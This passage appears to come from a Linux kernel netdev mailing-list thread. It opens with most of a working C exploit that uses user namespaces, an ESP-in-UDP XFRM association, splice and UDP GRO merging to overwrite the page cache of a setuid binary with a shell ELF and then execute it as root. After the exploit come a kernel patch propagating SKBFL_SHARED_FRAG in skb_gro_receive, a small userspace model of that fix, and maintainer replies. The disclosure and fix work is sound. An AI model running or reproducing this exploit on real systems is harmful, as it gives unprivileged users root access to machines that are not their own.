> 	uint32_t ns_pid = (uint32_t)pid;
> 	unsigned int idx = if_nametoindex(name);
> 	if (!idx) gate_fail("if_nametoindex");
> 	nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct rtnl_ifinfomsg));
> 	nlh->nlmsg_type = RTM_NEWLINK;
> 	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
> 	((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_family = AF_UNSPEC;
> 	((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_index = (int)idx;
> 	add_nlattr(nlh, sizeof(buf), IFLA_NET_NS_PID, &ns_pid, sizeof(ns_pid));
> 	nl_talk(nlh, NETLINK_ROUTE, "move veth");
> }
> 
> static void add_addr(const char *name, const char *addr)
> {
> 	char buf[4096] = {};
> 	struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
> 	struct in_addr a;
> 	unsigned int idx = if_nametoindex(name);
> 	if (!idx) gate_fail("if_nametoindex");
> 	inet_pton(AF_INET, addr, &a);
> 	nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct ifaddrmsg));
> 	nlh->nlmsg_type = RTM_NEWADDR;
> 	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE | NLM_F_EXCL;
> 	struct ifaddrmsg *ifa = (struct ifaddrmsg *)NLMSG_DATA(nlh);
> 	ifa->ifa_family = AF_INET;
> 	ifa->ifa_prefixlen = 24;
> 	ifa->ifa_index = idx;
> 	add_nlattr(nlh, sizeof(buf), IFA_LOCAL, &a, sizeof(a));
> 	add_nlattr(nlh, sizeof(buf), IFA_ADDRESS, &a, sizeof(a));
> 	nl_talk(nlh, NETLINK_ROUTE, "add addr");
> }
> 
> static void ethtool_set(const char *name, uint32_t cmd, uint32_t data)
> {
> 	struct ifreq ifr = {};
> 	struct { uint32_t cmd; uint32_t data; } val = { cmd, data };
> 	int fd = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0);
> 	if (fd < 0) return;
> 	strncpy(ifr.ifr_name, name, IFNAMSIZ - 1);
> 	ifr.ifr_data = (void *)&val;
> 	ioctl(fd, SIOCETHTOOL, &ifr);
> 	close(fd);
> }
> 
> /* ---- XDP attach/detach for NAPI init ---- */
> 
> static void xdp_toggle(const char *name, int prog_fd, uint32_t flags)
> {
> 	char buf[4096] = {};
> 	struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
> 	unsigned int idx = if_nametoindex(name);
> 	if (!idx) return;
> 	nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct rtnl_ifinfomsg));
> 	nlh->nlmsg_type = RTM_NEWLINK;
> 	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
> 	((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_family = AF_UNSPEC;
> 	((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_index = (int)idx;
> 	struct nlattr *x = nest_begin(nlh, sizeof(buf), IFLA_XDP | NLA_F_NESTED);
> 	add_nlattr(nlh, sizeof(buf), IFLA_XDP_FD, &prog_fd, sizeof(prog_fd));
> 	add_nlattr(nlh, sizeof(buf), IFLA_XDP_FLAGS, &flags, sizeof(flags));
> 	nest_end(nlh, x);
> 	nl_talk(nlh, NETLINK_ROUTE, "xdp");
> }
> 
> static void enable_veth_napi(const char *name)
> {
> 	struct bpf_insn { uint8_t code; uint8_t regs; int16_t off; int32_t imm; };
> 	struct bpf_insn prog[] = { { 0xb7, 0, 0, 2 }, { 0x95, 0, 0, 0 } };
> 	struct { uint32_t t; uint32_t c; uint64_t i; uint64_t l;
> 		 uint32_t a,b; uint64_t d; uint32_t e,f; char n[16]; } attr = {};
> 	static const char lic[] = "GPL";
> 	attr.t = 6; attr.c = 2;
> 	attr.i = (uint64_t)(unsigned long)prog;
> 	attr.l = (uint64_t)(unsigned long)lic;
> 	int fd = (int)syscall(__NR_bpf, 5, &attr, sizeof(attr));
> 	if (fd < 0) return;
> 	xdp_toggle(name, fd, XDP_FLAGS_SKB_MODE);
> 	close(fd);
> 	int m1 = -1;
> 	xdp_toggle(name, m1, XDP_FLAGS_SKB_MODE);
> }
> 
> /* ---- user namespace ---- */
> 
> static void setup_userns(void)
> {
> 	uid_t uid = getuid();
> 	gid_t gid = getgid();
> 	int rp[2], mp[2];
> 	if (pipe(rp) < 0 || pipe(mp) < 0) die("pipe");
> 	pid_t c = fork();
> 	if (c < 0) die("fork");
> 	if (c == 0) {
> 		char path[64], map[64]; pid_t pp = getppid();
> 		close(rp[1]); close(mp[0]); sync_read(rp[0]);
> 		snprintf(path, sizeof(path), "/proc/%d/setgroups", pp);
> 		int fd = open(path, O_WRONLY); if (fd >= 0) { write(fd, "deny", 4); close(fd); }
> 		snprintf(path, sizeof(path), "/proc/%d/uid_map", pp);
> 		snprintf(map, sizeof(map), "0 %u 1\n", uid);
> 		fd = open(path, O_WRONLY); if (fd >= 0) { write(fd, map, strlen(map)); close(fd); }
> 		snprintf(path, sizeof(path), "/proc/%d/gid_map", pp);
> 		snprintf(map, sizeof(map), "0 %u 1\n", gid);
> 		fd = open(path, O_WRONLY); if (fd >= 0) { write(fd, map, strlen(map)); close(fd); }
> 		sync_write(mp[1]); _exit(0);
> 	}
> 	close(rp[0]); close(mp[1]);
> 	if (unshare(CLONE_NEWUSER) < 0) gate_fail("unshare(CLONE_NEWUSER)");
> 	sync_write(rp[1]); sync_read(mp[0]); waitpid(c, NULL, 0);
> 	setresgid(0, 0, 0); setresuid(0, 0, 0);
> }
> 
> /* ---- XFRM SA ---- */
> 
> static void add_sa(void)
> {
> 	char buf[4096] = {};
> 	char ab[sizeof(struct xfrm_algo_aead) + sizeof(xfrm_key)];
> 	struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
> 	nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct xfrm_usersa_info));
> 	nlh->nlmsg_type = XFRM_MSG_NEWSA;
> 	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
> 	struct xfrm_usersa_info *xs = (struct xfrm_usersa_info *)NLMSG_DATA(nlh);
> 	xs->sel.family = AF_INET;
> 	inet_pton(AF_INET, ADDR_SRC, &xs->saddr.a4);
> 	inet_pton(AF_INET, ADDR_DST, &xs->id.daddr.a4);
> 	xs->id.spi = htonl(ESP_SPI); xs->id.proto = IPPROTO_ESP;
> 	xs->family = AF_INET; xs->mode = XFRM_MODE_TRANSPORT; xs->replay_window = 0;
> 	xs->lft.soft_byte_limit = xs->lft.hard_byte_limit = XFRM_INF;
> 	xs->lft.soft_packet_limit = xs->lft.hard_packet_limit = XFRM_INF;
> 	memset(ab, 0, sizeof(ab));
> 	struct xfrm_algo_aead *a = (struct xfrm_algo_aead *)ab;
> 	strcpy(a->alg_name, "rfc4106(gcm(aes))");
> 	a->alg_key_len = sizeof(xfrm_key) * 8;
> 	a->alg_icv_len = ICV_LEN * 8;
> 	memcpy(a->alg_key, xfrm_key, sizeof(xfrm_key));
> 	add_nlattr(nlh, sizeof(buf), XFRMA_ALG_AEAD, ab, sizeof(ab));
> 	struct xfrm_encap_tmpl encap = {};
> 	encap.encap_type = UDP_ENCAP_ESPINUDP;
> 	encap.encap_sport = htons(UDP_PORT);
> 	encap.encap_dport = htons(UDP_PORT);
> 	add_nlattr(nlh, sizeof(buf), XFRMA_ENCAP, &encap, sizeof(encap));
> 	nl_talk(nlh, NETLINK_XFRM, "add SA");
> }
> 
> /* ---- AES-GCM keystream ---- */
> 
> static void aes_ecb_block(int alg_fd, const unsigned char in[16], unsigned char out[16])
> {
> 	char cb[CMSG_SPACE(sizeof(uint32_t))] = {};
> 	struct iovec iov = { (void *)in, 16 };
> 	struct msghdr msg = { .msg_iov = &iov, .msg_iovlen = 1, .msg_control = cb, .msg_controllen = sizeof(cb) };
> 	uint32_t op = ALG_OP_ENCRYPT;
> 	struct cmsghdr *cm = CMSG_FIRSTHDR(&msg);
> 	cm->cmsg_level = SOL_ALG; cm->cmsg_type = ALG_SET_OP;
> 	cm->cmsg_len = CMSG_LEN(sizeof(op));
> 	memcpy(CMSG_DATA(cm), &op, sizeof(op));
> 	int ofd = accept4(alg_fd, NULL, NULL, SOCK_CLOEXEC);
> 	if (ofd < 0) die("AF_ALG accept");
> 	if (sendmsg(ofd, &msg, 0) != 16) die("AF_ALG send");
> 	if (read(ofd, out, 16) != 16) die("AF_ALG read");
> 	close(ofd);
> }
> 
> /*
>  * rfc4106 shifts the 8-byte ESP IV into the AAD, so the inner GCM
>  * ciphertext starts at frag byte 0. The target byte is at CTR position 0.
>  */
> #define KS_POS 0
> 
> static uint16_t stream_nonce[256];
> static bool stream_have[256];
> 
> static void build_stream_table(void)
> {
> 	struct sockaddr_alg sa = { .salg_family = AF_ALG };
> 	strcpy((char *)sa.salg_type, "skcipher");
> 	strcpy((char *)sa.salg_name, "ecb(aes)");
> 	int fd = socket(AF_ALG, SOCK_SEQPACKET | SOCK_CLOEXEC, 0);
> 	if (fd < 0) die("AF_ALG");
> 	if (bind(fd, (struct sockaddr *)&sa, sizeof(sa)) < 0) die("AF_ALG bind");
> 	if (setsockopt(fd, SOL_ALG, ALG_SET_KEY, xfrm_key, 16) < 0) die("AF_ALG key");
> 
> 	unsigned int count = 0;
> 	for (unsigned nonce = 0; nonce <= 0xffff && count < 256; nonce++) {
> 		unsigned char iv[8], cb[16], out[16];
> 		memset(iv, 0xcc, sizeof(iv));
> 		store_be32(iv + 4, nonce);
> 		memcpy(cb, &xfrm_key[16], 4);
> 		memcpy(cb + 4, iv, 8);
> 		store_be32(cb + 12, 2 + KS_POS / 16);
> 		aes_ecb_block(fd, cb, out);
> 		unsigned char b = out[KS_POS % 16];
> 		if (stream_have[b]) continue;
> 		stream_have[b] = true;
> 		stream_nonce[b] = (uint16_t)nonce;
> 		count++;
> 	}
> 	close(fd);
> 	if (count < 256) { fprintf(stderr, "incomplete stream table: %u/256\n", count); exit(2); }
> }
> 
> /* ---- main ---- */
> 
> int main(void)
> {
> 	setvbuf(stdout, NULL, _IONBF, 0);
> 
> 	printf("[*] uid=%d euid=%d gid=%d egid=%d\n",
> 	       getuid(), geteuid(), getgid(), getegid());
> 	printf("[*] mode=gro_espinudp_pagecache_replace\n\n");
> 
> 	struct stat st;
> 	if (stat(target_file, &st) < 0 || !S_ISREG(st.st_mode) || st.st_size < PAYLOAD_LEN + SPLICE_LEN)
> 		die("stat target");
> 
> 	printf("[*] target=%s size=%lld\n", target_file, (long long)st.st_size);
> 
> 	build_stream_table();
> 	printf("[*] stream_table=256 entries at ciphertext position %d\n", KS_POS);
> 
> 	/*
> 	 * Fork before entering the user namespace. The child enters the
> 	 * user/net namespace and does all the page-cache corruption. The
> 	 * parent stays in the init user namespace so that execve() of the
> 	 * corrupted setuid su binary honors the setuid bit, giving a real
> 	 * root shell rather than a fake namespace-root shell.
> 	 */
> 	fflush(stdout); fflush(stderr);
> 	pid_t worker = fork();
> 	if (worker < 0) die("fork worker");
> 	if (worker > 0) {
> 		int wstatus;
> 		waitpid(worker, &wstatus, 0);
> 		if (WIFEXITED(wstatus) && WEXITSTATUS(wstatus) == 1) {
> 			char *argv[] = { (char *)target_file, NULL };
> 			char *envp[] = { NULL };
> 			execve(target_file, argv, envp);
> 		}
> 		return WIFEXITED(wstatus) ? WEXITSTATUS(wstatus) : 2;
> 	}
> 
> 	/* Child: enter user namespace and do the corruption */
> 	if (getuid() != 0) setup_userns();
> 	if (unshare(CLONE_NEWNET) < 0) gate_fail("unshare(CLONE_NEWNET)");
> 	if_up("lo");
> 	create_veth();
> 
> 	int p_ns[2], p_veth[2], p_rdy[2];
> 	if (pipe(p_ns) < 0 || pipe(p_veth) < 0 || pipe(p_rdy) < 0) die("pipe");
> 	fflush(stdout); fflush(stderr);
> 
> 	pid_t rx = fork();
> 	if (rx < 0) die("fork");
> 
> 	if (rx == 0) {
> 		close(p_ns[0]); close(p_veth[1]); close(p_rdy[0]);
> 		if (unshare(CLONE_NEWNET) < 0) gate_fail("unshare(CLONE_NEWNET)");
> 		if (unshare(CLONE_NEWNS) < 0) gate_fail("unshare(CLONE_NEWNS)");
> 		mount("", "/", NULL, MS_PRIVATE | MS_REC, NULL);
> 		mount("sysfs", "/sys", "sysfs", 0, NULL);
> 		sync_write(p_ns[1]); close(p_ns[1]);
> 		sync_read(p_veth[0]); close(p_veth[0]);
> 		if_up("lo");
> 		ethtool_set(VETH1, ETHTOOL_SGRO, 1);
> 		if_up(VETH1);
> 		enable_veth_napi(VETH1);
> 		add_addr(VETH1, ADDR_DST);
> 		add_sa();
> 		int ufd = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0);
> 		if (ufd < 0) gate_fail("socket");
> 		struct sockaddr_in ba = { .sin_family = AF_INET, .sin_port = htons(UDP_PORT) };
> 		inet_pton(AF_INET, ADDR_DST, &ba.sin_addr);
> 		if (bind(ufd, (struct sockaddr *)&ba, sizeof(ba)) < 0) gate_fail("bind");
> 		int et = UDP_ENCAP_ESPINUDP, gro = 1;
> 		setsockopt(ufd, IPPROTO_UDP, UDP_ENCAP, &et, sizeof(et));
> 		setsockopt(ufd, IPPROTO_UDP, UDP_GRO, &gro, sizeof(gro));
> 		sync_write(p_rdy[1]);
> 		pause();
> 		_exit(0);
> 	}
> 
> 	close(p_ns[1]); close(p_veth[0]); close(p_rdy[1]);
> 	sync_read(p_ns[0]); close(p_ns[0]);
> 	move_to_netns(VETH1, rx);
> 	sync_write(p_veth[1]); close(p_veth[1]);
> 	if_up(VETH0); add_addr(VETH0, ADDR_SRC);
> 	ethtool_set(VETH0, ETHTOOL_STSO, 0);
> 	ethtool_set(VETH0, ETHTOOL_SGSO, 0);
> 
> 	/*
> 	 * Add a netem delay on the sender veth so both datagrams sit in the
> 	 * qdisc until the timer fires, then get released into veth_xmit()
> 	 * within the same softirq context. This guarantees both land in one
> 	 * NAPI poll cycle for GRO to merge them, without needing sysfs
> 	 * gro_flush_timeout (which requires capable(CAP_NET_ADMIN) in the
> 	 * init namespace). tc uses netlink with ns_capable(), so it works
> 	 * from a user namespace.
> 	 */
> 	if (system("tc qdisc add dev " VETH0 " root netem delay 20ms") != 0)
> 		gate_fail("tc netem");
> 	usleep(50000);
> 
> 	sync_read(p_rdy[0]); close(p_rdy[0]);
> 
> 	int sock = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0);
> 	if (sock < 0) die("socket");
> 	struct sockaddr_in sa = { .sin_family = AF_INET, .sin_port = htons(UDP_PORT) };
> 	struct sockaddr_in da = { .sin_family = AF_INET, .sin_port = htons(UDP_PORT) };
> 	inet_pton(AF_INET, ADDR_SRC, &sa.sin_addr);
> 	inet_pton(AF_INET, ADDR_DST, &da.sin_addr);
> 	bind(sock, (struct sockaddr *)&sa, sizeof(sa));
> 	connect(sock, (struct sockaddr *)&da, sizeof(da));
> 
> 	int target_fd = open(target_file, O_RDONLY | O_CLOEXEC);
> 	if (target_fd < 0) die("open target");
> 
> 	uint32_t seq = 1;
> 	size_t total_changed = 0;
> 	int delay_ms = 20;
> 	int sleep_us = 40000;
> 	struct timespec last_ok;
> 	clock_gettime(CLOCK_MONOTONIC, &last_ok);
> 
> 	printf("[*] replacing %d bytes starting at offset 0\n", PAYLOAD_LEN);
> 
> 	/* Warmup: send a dummy pair to prime the netem/NAPI path */
> 	{
> 		unsigned char w[16 + SPLICE_LEN];
> 		memset(w, 0, sizeof(w));
> 		store_be32(w, ESP_SPI);
> 		store_be32(w + 4, seq++);
> 		send(sock, w, sizeof(w), 0);
> 		store_be32(w + 4, seq++);
> 		send(sock, w, sizeof(w), 0);
> 		usleep(sleep_us);
> 	}
> 
> 	for (int pass = 0; ; pass++) {
> 		size_t pass_changed = 0, remaining = 0;
> 
> 		for (int idx = 0; idx < PAYLOAD_LEN; idx++) {
> 			unsigned char cur = read_byte_at(target_fd, idx);
> 			if (cur == shell_elf[idx])
> 				continue;
> 			remaining++;
> 
> 			unsigned char need_ks = cur ^ shell_elf[idx];
> 			uint16_t nonce = stream_nonce[need_ks];
> 			unsigned char iv[8];
> 			memset(iv, 0xcc, sizeof(iv));
> 			store_be32(iv + 4, nonce);
> 
> 			unsigned char hdr[16];
> 			char hp[] = "/tmp/fgro-XXXXXX";
> 			int hfd = mkstemp(hp); unlink(hp);
> 			store_be32(hdr, ESP_SPI); store_be32(hdr + 4, seq++);
> 			memcpy(hdr + 8, iv, 8);
> 			write(hfd, hdr, 16);
> 
> 			int pfd[2];
> 			pipe(pfd);
> 			loff_t ho = 0;
> 			splice(hfd, &ho, pfd[1], NULL, 16, 0);
> 			loff_t so = (loff_t)idx;
> 			splice(target_fd, &so, pfd[1], NULL, SPLICE_LEN, 0);
> 			close(hfd);
> 
> 			unsigned char p1[16 + SPLICE_LEN];
> 			store_be32(p1, ESP_SPI); store_be32(p1 + 4, seq++);
> 			memcpy(p1 + 8, iv, 8);
> 			memset(p1 + 16, 0x41, SPLICE_LEN);
> 			send(sock, p1, sizeof(p1), 0);
> 
> 			int cork = 1;
> 			setsockopt(sock, IPPROTO_UDP, UDP_CORK, &cork, sizeof(cork));
> 			splice(pfd[0], NULL, sock, NULL, 16 + SPLICE_LEN, 0);
> 			cork = 0;
> 			setsockopt(sock, IPPROTO_UDP, UDP_CORK, &cork, sizeof(cork));
> 			close(pfd[0]); close(pfd[1]);
> 
> 			usleep(sleep_us);
> 
> 			unsigned char got = read_byte_at(target_fd, idx);
> 			if (got == shell_elf[idx]) {
> 				total_changed++;
> 				pass_changed++;
> 				clock_gettime(CLOCK_MONOTONIC, &last_ok);
> 				printf("\r[+] byte %3d/%-3d  0x%02x -> 0x%02x  ok  (%zu changed)",
> 				       idx, PAYLOAD_LEN, cur, got, total_changed);
> 			} else {
> 				printf("\r[-] byte %3d/%-3d  0x%02x -> 0x%02x (want 0x%02x) MISS",
> 				       idx, PAYLOAD_LEN, cur, got, shell_elf[idx]);
> 			}
> 			fflush(stdout);
> 		}
> 
> 		if (remaining == 0)
> 			break;
> 
> 		size_t still_wrong = 0;
> 		for (int idx = 0; idx < PAYLOAD_LEN; idx++)
> 			if (read_byte_at(target_fd, idx) != shell_elf[idx])
> 				still_wrong++;
> 
> 		if (still_wrong == 0)
> 			break;
> 
> 		struct timespec now;
> 		clock_gettime(CLOCK_MONOTONIC, &now);
> 		long elapsed = (now.tv_sec - last_ok.tv_sec) * 1000 +
> 			       (now.tv_nsec - last_ok.tv_nsec) / 1000000;
> 		if (elapsed > 30000) {
> 			printf("\n[!] %zu bytes stuck after 30s without progress\n",
> 			       still_wrong);
> 			break;
> 		}
> 
> 		if (delay_ms < 500) {
> 			delay_ms = delay_ms < 250 ? delay_ms * 2 : 500;
> 			sleep_us = delay_ms * 2000;
> 			char cmd[128];
> 			snprintf(cmd, sizeof(cmd),
> 				 "tc qdisc change dev " VETH0 " root netem delay %dms",
> 				 delay_ms);
> 			system(cmd);
> 		}
> 		printf("\n[*] pass %d: %zu ok, %zu still wrong, delay now %dms, retrying\n",
> 		       pass + 1, pass_changed, still_wrong, delay_ms);
> 		fflush(stdout);
> 	}
> 
> 	close(target_fd);
> 	close(sock);
> 	kill(rx, SIGTERM);
> 	waitpid(rx, NULL, 0);
> 
> 	/* Final verification: count how many bytes match shell_elf */
> 	int final_fd = open(target_file, O_RDONLY | O_CLOEXEC);
> 	size_t matching = 0;
> 	if (final_fd >= 0) {
> 		for (int i = 0; i < PAYLOAD_LEN; i++)
> 			if (read_byte_at(final_fd, i) == shell_elf[i])
> 				matching++;
> 		close(final_fd);
> 	}
> 
> 	printf("\n\n");
> 	if (total_changed > 0) {
> 		printf("VULNERABLE: %zu/%d payload bytes now match shell_elf "
> 		       "(%zu written via GRO flag-strip)\n",
> 		       matching, PAYLOAD_LEN, total_changed);
> 		_exit(1);
> 	}
> 
> 	printf("FIXED: 0/%d bytes changed\n", PAYLOAD_LEN);
> 	_exit(0);
> }

> From c3ec785f197bf329c443aa547eb70864e2ef29ac Mon Sep 17 00:00:00 2001
> From: Sultan Alsawaf <sultan@kerneltoast.com>
> Date: Wed, 13 May 2026 21:47:51 -0700
> Subject: [PATCH] net: gro: propagate SKBFL_SHARED_FRAG in skb_gro_receive()
> 
> skb_gro_receive() moves frag descriptors from the incoming skb to the
> GRO accumulator through two frag-transfer paths (the direct frag-move
> loop and the head_frag + memcpy path) without propagating the
> SKBFL_SHARED_FRAG flag from the incoming skb's shinfo->flags. As a
> result, the accumulator ends up holding references to externally owned
> or page-cache-backed pages while reporting skb_has_shared_frag() as
> false.
> 
> This is the same bug class as CVE-2026-46300 (d8cfbcdd07557, "net:
> skbuff: propagate shared-frag marker through frag-transfer helpers"),
> which fixed the identical omission in __pskb_copy_fclone(),
> skb_try_coalesce(), and skb_shift(). skb_gro_receive() was missed in
> that fix since it lives in net/core/gro.c rather than net/core/skbuff.c.
> 
> The impact is observable through ESP-over-UDP with UDP GRO: splice()
> attaches page-cache pages to a UDP skb, setting SKBFL_SHARED_FRAG via
> ip_append_page(). When two such datagrams are GRO-merged via
> skb_gro_receive(), the flag is dropped. After udp_rcv_segment()
> re-segments the merged GSO skb, the fresh segments carry the
> page-cache frags without the shared-frag marker. esp_input() then sees
> !skb_cloned() && !skb_has_shared_frag() and takes the skip_cow fast
> path, decrypting in place over the page-cache pages. Because AES-GCM
> CTR decryption runs before the authentication tag is verified, the
> page cache is corrupted even though the tag check subsequently fails.
> 
> Fix it by propagating SKBFL_SHARED_FRAG from the incoming skb to the
> accumulator in both frag-transfer paths, matching what the skbuff.c
> helpers already do. The third path (frag_list merge at the "merge:"
> label) chains the entire incoming skb onto the accumulator's frag_list
> without moving individual frag descriptors, so each sub-skb retains
> its own flags and no propagation is needed there.
> 
> Fixes: cef401de7be8 ("net: fix possible wrong checksum generation")
> Fixes: f4c50a4034e6 ("xfrm: esp: avoid in-place decrypt on shared skb frags")
> Cc: stable@vger.kernel.org
> Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
> Signed-off-by: Sultan Alsawaf <sultan@kerneltoast.com>
> ---
>  net/core/gro.c | 4 ++++
>  1 file changed, 4 insertions(+)
> 
> diff --git a/net/core/gro.c b/net/core/gro.c
> index 31d21de5b15a7..4ac41ced13aeb 100644
> --- a/net/core/gro.c
> +++ b/net/core/gro.c
> @@ -145,6 +145,8 @@ int skb_gro_receive(struct sk_buff *p, struct sk_buff *skb)
>  		skb_frag_off_add(frag, offset);
>  		skb_frag_size_sub(frag, offset);
>  
> +		pinfo->flags |= skbinfo->flags & SKBFL_SHARED_FRAG;
> +
>  		/* all fragments truesize : remove (head size + sk_buff) */
>  		new_truesize = SKB_TRUESIZE(skb_end_offset(skb));
>  		delta_truesize = skb->truesize - new_truesize;
> @@ -176,6 +178,8 @@ int skb_gro_receive(struct sk_buff *p, struct sk_buff *skb)
>  		memcpy(frag + 1, skbinfo->frags, sizeof(*frag) * skbinfo->nr_frags);
>  		/* We dont need to clear skbinfo->nr_frags here */
>  
> +		pinfo->flags |= skbinfo->flags & SKBFL_SHARED_FRAG;
> +
>  		new_truesize = SKB_DATA_ALIGN(sizeof(struct sk_buff));
>  		delta_truesize = skb->truesize - new_truesize;
>  		skb->truesize = new_truesize;
> -- 
> 2.54.0
> 
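
For readers following the thread, the one-line fix in the quoted patch can
be modeled in userspace. This is only a rough sketch under stated
assumptions: struct model_shinfo, the MODEL_* flag values, and both helper
names are hypothetical stand-ins rather than kernel definitions, and the
nonlinearity test is simplified to nr_frags > 0.

```c
#include <stdbool.h>

/* Hypothetical flag bits; the values are illustrative, not the kernel's. */
#define MODEL_OTHER_FLAG  (1u << 0)
#define MODEL_SHARED_FRAG (1u << 1)

/* Hypothetical, heavily reduced stand-in for skb_shared_info. */
struct model_shinfo {
	unsigned int flags;
	unsigned int nr_frags;
};

/*
 * Move all frag descriptors from src to dst (modeled as a counter) and
 * carry over only the shared-frag bit, mirroring the idiom used in the
 * patch: pinfo->flags |= skbinfo->flags & SKBFL_SHARED_FRAG;
 */
static inline void model_move_frags(struct model_shinfo *dst,
				    struct model_shinfo *src)
{
	dst->nr_frags += src->nr_frags;
	src->nr_frags = 0;
	dst->flags |= src->flags & MODEL_SHARED_FRAG;
}

/* Simplified analogue of skb_has_shared_frag(): frags present and bit set. */
static inline bool model_has_shared_frag(const struct model_shinfo *si)
{
	return si->nr_frags > 0 && (si->flags & MODEL_SHARED_FRAG) != 0;
}
```

Masking with the single bit before OR-ing means the destination gains the
marker when the source had it, never loses a marker it already carried, and
does not inherit unrelated source flags.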



* Re: [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers
  2026-05-14  8:04 ` Paolo Abeni
@ 2026-05-14  9:38   ` Hyunwoo Kim
  2026-05-14 10:21     ` Sabrina Dubroca
  0 siblings, 1 reply; 6+ messages in thread
From: Hyunwoo Kim @ 2026-05-14  9:38 UTC (permalink / raw)
  To: Paolo Abeni
  Cc: kuba, steffen.klassert, netdev, stable, mhal, davem, horms,
	edumazet, kerneljasonxing, herbert, vakzz, kuniyu, jiayuan.chen,
	ben, dsahern, Sabrina Dubroca, imv4bel

On Thu, May 14, 2026 at 10:04:29AM +0200, Paolo Abeni wrote:
> On 5/13/26 11:07 PM, Hyunwoo Kim wrote:
> > Three frag-transfer helpers (__pskb_copy_fclone(), skb_try_coalesce(),
> > and skb_shift()) fail to propagate the SKBFL_SHARED_FRAG bit in
> > skb_shinfo()->flags when moving frags from source to destination.
> > __pskb_copy_fclone() defers the rest of the shinfo metadata to
> > skb_copy_header() after copying frag descriptors, but that helper
> > only carries over gso_{size,segs,type} and never touches
> > skb_shinfo()->flags; skb_try_coalesce() and skb_shift() move frag
> > descriptors directly and leave flags untouched.  As a result, the
> > destination skb keeps a reference to the same externally-owned or
> > page-cache-backed pages while reporting skb_has_shared_frag() as
> > false.
> > 
> > The mismatch is harmful in any in-place writer that uses
> > skb_has_shared_frag() to decide whether shared pages must be detoured
> > through skb_cow_data().  ESP input is one such writer (esp4.c,
> > esp6.c), and a single nft 'dup to <local>' rule -- or any other
> > nf_dup_ipv4() / xt_TEE caller -- is enough to land a pskb_copy()'d
> > skb in esp_input() with the marker stripped, letting an unprivileged
> > user write into the page cache of a root-owned read-only file via
> > authencesn-ESN stray writes.
> > 
> > Set SKBFL_SHARED_FRAG on the destination whenever frag descriptors
> > were actually moved from the source.  skb_copy() and skb_copy_expand()
> > share skb_copy_header() too but linearize all paged data into freshly
> > allocated head storage and emerge with nr_frags == 0, so
> > skb_has_shared_frag() returns false on its own; they need no change.
> > 
> > Fixes: cef401de7be8 ("net: fix possible wrong checksum generation")
> > Fixes: f4c50a4034e6 ("xfrm: esp: avoid in-place decrypt on shared skb frags")
> 
> WRT the 2nd fixes tag, I *think* f4c50a4034e6 would need
> additionally/instead a follow-up similar to the one mentioned by Jakub here:
> 
> https://lore.kernel.org/all/20260510084520.476745b5@kernel.org/

Agreed. Tracing SKBFL_SHARED_FRAG propagation paths one by one is
not a robust direction for the fix. Even minor logic changes elsewhere
could cause the issue to resurface.

As a follow-up, eliminating the in-place handling in esp_input -- accepting
the performance trade-off -- seems necessary. That was actually the
direction of my initial proposal:

https://lore.kernel.org/all/afLDKSvAvMwGh7Fy@v4bel/


Best regards,
Hyunwoo Kim


* Re: [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers
  2026-05-14  9:38   ` Hyunwoo Kim
@ 2026-05-14 10:21     ` Sabrina Dubroca
  0 siblings, 0 replies; 6+ messages in thread
From: Sabrina Dubroca @ 2026-05-14 10:21 UTC (permalink / raw)
  To: Hyunwoo Kim
  Cc: Paolo Abeni, kuba, steffen.klassert, netdev, stable, mhal, davem,
	horms, edumazet, kerneljasonxing, herbert, vakzz, kuniyu,
	jiayuan.chen, ben, dsahern

2026-05-14, 18:38:34 +0900, Hyunwoo Kim wrote:
> On Thu, May 14, 2026 at 10:04:29AM +0200, Paolo Abeni wrote:
> > On 5/13/26 11:07 PM, Hyunwoo Kim wrote:
> > > Three frag-transfer helpers (__pskb_copy_fclone(), skb_try_coalesce(),
> > > and skb_shift()) fail to propagate the SKBFL_SHARED_FRAG bit in
> > > skb_shinfo()->flags when moving frags from source to destination.
> > > __pskb_copy_fclone() defers the rest of the shinfo metadata to
> > > skb_copy_header() after copying frag descriptors, but that helper
> > > only carries over gso_{size,segs,type} and never touches
> > > skb_shinfo()->flags; skb_try_coalesce() and skb_shift() move frag
> > > descriptors directly and leave flags untouched.  As a result, the
> > > destination skb keeps a reference to the same externally-owned or
> > > page-cache-backed pages while reporting skb_has_shared_frag() as
> > > false.
> > > 
> > > The mismatch is harmful in any in-place writer that uses
> > > skb_has_shared_frag() to decide whether shared pages must be detoured
> > > through skb_cow_data().  ESP input is one such writer (esp4.c,
> > > esp6.c), and a single nft 'dup to <local>' rule -- or any other
> > > nf_dup_ipv4() / xt_TEE caller -- is enough to land a pskb_copy()'d
> > > skb in esp_input() with the marker stripped, letting an unprivileged
> > > user write into the page cache of a root-owned read-only file via
> > > authencesn-ESN stray writes.
> > > 
> > > Set SKBFL_SHARED_FRAG on the destination whenever frag descriptors
> > > were actually moved from the source.  skb_copy() and skb_copy_expand()
> > > share skb_copy_header() too but linearize all paged data into freshly
> > > allocated head storage and emerge with nr_frags == 0, so
> > > skb_has_shared_frag() returns false on its own; they need no change.
> > > 
> > > Fixes: cef401de7be8 ("net: fix possible wrong checksum generation")
> > > Fixes: f4c50a4034e6 ("xfrm: esp: avoid in-place decrypt on shared skb frags")
> > 
> > WRT the 2nd fixes tag, I *think* f4c50a4034e6 would need
> > additionally/instead a follow-up similar to the one mentioned by Jakub here:
> > 
> > https://lore.kernel.org/all/20260510084520.476745b5@kernel.org/
> 
